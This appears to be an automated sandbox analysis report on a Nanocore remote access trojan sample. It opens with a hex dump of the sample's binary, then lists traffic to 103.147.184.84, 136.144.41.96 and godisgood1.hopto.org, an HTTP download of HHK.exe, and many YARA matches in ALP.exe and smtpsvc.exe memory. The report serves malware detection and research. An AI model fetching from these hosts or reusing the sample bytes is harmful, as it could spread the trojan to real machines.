00 00 00 00 00 00 a0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 48 09 00 4f 00 00 00 00 60 09 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 09 00 0c 00 00 00 4c 48 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 28 09 00 00 20 00 00 00 2a 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 09 00 00 02 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 48 09 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 c4 5e 01 00 03 00 00 00 6f 00 00 06 54 9e 01 00 f8 a9 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 02
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 103.147.184.84:7712
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.96
        Source: ALP.exe, 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmpString found in binary or memory: http://google.com
        Source: ALP.exe, 00000004.00000002.695025168.0000000005880000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690337039.0000000001C70000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: ALP.exe, 00000004.00000002.695025168.0000000005880000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690337039.0000000001C70000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
        Source: unknownDNS traffic detected: queries for: godisgood1.hopto.org
        Source: global trafficHTTP traffic detected: GET /HHK.exe HTTP/1.1Connection: Keep-AliveHost: 136.144.41.96
        Source: ALP.exe, 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTR

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 16.2.smtpsvc.exe.2564e04.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.376af3e.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.376af3e.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3601ae8.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.8a0000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.21d0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3753cdf.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.230e8a4.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.790000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.820000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3753cdf.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3753cdf.31.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.24b88bc.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3601ae8.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.7c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.8b0000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.2304c9f.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24ac674.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24ac674.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.820000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.8c0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24b88bc.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24b88bc.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.3606787.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.780000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.21b0000.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.2300000.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.8c0000.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.790000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.8a0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.780000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.22f4d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.361038c.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.2254e04.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.21b0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.8b0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.375cb0e.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24ac674.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.375cb0e.30.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.21d0000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24ccef8.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24ccef8.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.850000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.840000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.840000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.244df88.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.2300000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.690880215.0000000000780000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.690912627.0000000000790000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.691516728.00000000021D0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.690432511.0000000000470000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
